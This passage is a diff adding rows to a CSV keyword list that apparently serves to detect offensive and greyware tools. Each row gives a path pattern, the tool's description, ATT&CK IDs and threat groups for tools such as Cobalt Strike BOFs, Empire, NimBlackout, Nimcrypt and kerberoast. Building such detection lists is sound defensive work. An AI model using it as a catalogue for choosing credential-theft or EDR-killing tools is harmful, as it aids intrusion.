security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/nessus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nessus-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/net_recon/*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*/net_sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 
- T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*/net_sniff_*.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z"
+"*/netbus-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/netbus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/netbus-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/netbus-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/netcreds.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/NetExec.git*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/netexec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool 
that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/NetExec-main*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/Net-GPPPassword.git*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z"
+"*/nethunter-images/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/NetLoader.git*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
+"*/netntlm.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*/NetNTLMtoSilverTicket*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z"
+"*/netscan.exe*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","1","N/A","6","10","N/A","N/A","N/A","N/A"
+"*/netscan.exe*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 
","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A"
+"*/netscan_linux.tar.gz*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A"
+"*/netscan_portable.zip*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A"
+"*/netscan_setup.exe*","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","8","10","N/A","N/A","N/A","N/A"
+"*/netshrun.c*","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*/netsparker.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/netstat_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*/nettitude/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/nettitude/RunOF/*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z"
+"*/NetUser.cpp*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z"
+"*/NetUser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z"
+"*/netuserenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon 
Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z"
+"*/network/bloodhound3*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/Network/PortScan/*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z"
+"*/NewPhish.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/Newtonsoft.Json.dll*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda 
- Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*/nexpose-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nfs-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nfs-showmount.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nfs-statfs.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/nginxed-root.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/nidem/kerberoast*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z"
+"*/Nightmangle.git*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z"
+"*/nikto.git*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z"
+"*/nikto.pl*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z"
+"*/nikto.pl*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - 
T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z"
+"*/NimBlackout*","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","232","33","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z"
+"*/NimBlackout*","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","0","N/A","N/A","3","232","33","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z"
+"*/NimBlackout*","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","232","33","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z"
+"*/NimBlackout*","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","0","N/A","N/A","3","232","33","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z"
+"*/NimBlackout*","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","3","232","33","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z"
+"*/nimcrypt.nim*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z"
+"*/nimcrypt/*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z"
+"*/Nimcrypt2*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z"
